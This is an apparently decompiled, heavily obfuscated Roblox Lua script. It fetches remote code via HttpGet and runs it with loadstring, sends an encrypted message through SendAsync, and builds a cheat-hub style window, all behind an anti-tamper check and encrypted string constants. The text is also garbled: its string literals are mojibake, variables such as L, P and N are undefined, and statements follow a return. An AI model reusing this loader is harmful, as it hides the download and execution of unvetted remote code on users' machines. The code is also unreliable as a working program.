local concat = table.concat
local v62 = {}
local char = string.char
for index = 1, 256 do
    char[index] = index 
end
local enable1 = #char == 0
local removedVal = table.remove(char, math.random(1, #char))
removedVal = #char
local v5 = 0
enable1 = removedVal == v5
if enable1 then
    local function function5(function4, function3, ...)
        local tbl5 = function4
        return tbl5.WaitForChild(tbl5, function3) 
    end
    
    setmetatable({}, { ["__index"] = v32, ["__metatable"] = nil })
    local v42 = _G
    
    local function function8(function7, function6, ...)
        local tbl6 = function7
        return tbl6.SendAsync(tbl6, function6) 
    end
    
    local GAME = GAME
    
    local function function10(function9, ...)
        local GAME2 = GAME
        return GAME2.GetService(GAME2, function9) 
    end
    
    local function function12(function11, ...) return loadstring(function11)() end
    
    function10 = function10("Tw脛\x1a卤枚忙茂9{聼聬]聨脛脙脜w脧8=聠")
    enable1 = function10("s\x19-U\x16\x00篓露脛\x00\x10貌")["Lo聥猫脣赂脰聢(聭Z颅\x19"]
    local tbl2 = enable1["]脕聲\x10脻\x05"]
    local tbl = enable1["Ua5脣煤么脪#"]
    local tbl4 = function10.WaitForChild(function10, "5l炉}猫l_h脕b脠\x0ea聭|w")
    tbl4.WaitForChild(tbl4, "%聡\x14 脽聭聻4s聦\x17\\kF\x12")
    local v12 = ")碌O聲脨;脺>聶谩"
    tbl = L[P]
    if tbl2["\x11{碌)脰聰聯脩4脌sr掳"] and tbl[10994079340] then
        v12 = "~8隆盲聭脝脿}"
    else
        local v22 = tbl2["聯\x01眉^@d0聯脮聥聺搂聜铆x露*聭聼K枚"]
        if v22 and tbl[5240193892] then
            v12 = "#芒聜\x04\x15莽脷!"
        else
            v22 = tbl2
            tbl = tbl2
            if tbl2 then
                v12 = "PU卯yZ\x08貌酶\x0e1\r/"
            else
                return error(), false
                local tbl3 = (function(function2, ...) return loadstring(function2)() end)((function(function1, ...)
                    tbl = L[tbl4]
                    return tbl.HttpGet(tbl, function1) 
                end)("h聛*聛|卤\x07潞谩聢聙路e忙聼U茂聞v聛I\x11没/聟\x19m麓脗Z聜\x00脛\x04陆脿o(脩脥\x19B聸聳脛tq脧L脟聥聺:聬ri聢脡L铆茫脣垄茂EDY脨E\"]w脴a霉聤脙赂2(聻脙脝<聛镁6\x1fbu茫聥5谩\x15\x1d聽n\x1c聫聤x\tD脥\x13y聙"))
                N.SendAsync(N, "F聽脹\x16y\x1ek聽鹿卯\x16脩{pv]x脧拢]F\x05\x15录猫脺虏\x0bp/忙\n]\x05脙\"\x0f梅莽\x05|脥\x10聸没 脠铆o卢\x04脰\x00\x11r掳鹿脣G*梅脭聡\x00ab")
                tbl3.MakeWindow(tbl3, tbl3, {
                    ["N聜卢脵赂5脫"] = "B聬&\x1c\x0eS|\x06gR?梅",
                    ["FreO潞h脿\x05麓\x06Zj"] = true,
                    ["H聢#\x01^戮\x0f*\"潞8聙\x19脌\x16d聴"] = true,
                    [",pb赂聹(茂?聨卢每Z脺\x1ca\x194f6"] = true,
                    ["\x18盲\x14-鲁帽聳聦颅脛/c"] = "Cw脳聼\x19陇脻聦录\x14R`脮\x0b\x14锚T\x1b脢g脕貌帽聟忙",
                    ["%(Wv\\B4帽脷\\U聹梅陋陇鲁"] = "r1脦p\x07f茫\x0b录\x08v禄sD聦\\聹没露Z+\x1a聝脢\x04么茂\x18掳聛鹿vy颅聠玫聨碌f1",
                    ["KrL谩脙\x02-x\x13脕?6#^脮Z脧L莽卢铆r"] = "M-",
                    ["SaveCX\x13枚.戮每\"煤"] = true,
                    ["C贸麓\x15脣驴_聝E脵脜職脭脫矛聰"] = ":Ry\x1fr脥芦脛職\x14\x0f\x0f脠o眉1脼矛"
                })
            end
        end
    end
end